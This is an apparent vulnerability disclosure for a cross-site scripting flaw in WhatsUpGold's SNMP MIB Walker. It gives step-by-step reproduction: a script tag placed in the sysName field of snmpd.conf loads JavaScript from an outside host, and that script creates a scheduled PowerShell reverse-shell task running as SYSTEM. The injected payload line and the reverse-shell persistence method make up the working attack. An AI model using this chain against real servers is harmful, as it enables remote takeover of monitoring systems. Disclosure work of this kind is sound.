Improper validation of strings from SNMP devices when using the SNMP MIB Walker, makes the application prone to a reflected XXS attack.
Steps To Reproduce:
Place a XSS payload in the SNMPD.conf on a Linux computer. Have the payload open a javascript file hosted on a HTTPS webserver (Because WhatsUpGold uses HTTPS, you cannot link to a HTTP webserver). SNMP walk the Linux computers IP.
Modify script below to run revshell. You can de-base my payload and change IP and port, then base64 encode again and put it in script. Or run another payload of course.
Save the script on a webserver
Add XSS pointing at url of script in SNMPD config, I placed it in sysName:
sysContact Me <[email protected]>
sysLocation Home
sysName LinuxPC<script src='https://f20.be/t.js'/>
Open the SNMP MIB Walker tool and "walk" the IP address of the Linux computer
Script
Function of script
It will make an powershell-task, containing reverse shell in this example
Trigger the task to run every five minutes
Impact
The attacker will have Remote Code Execution as the "NT System" account.
Full control of the server.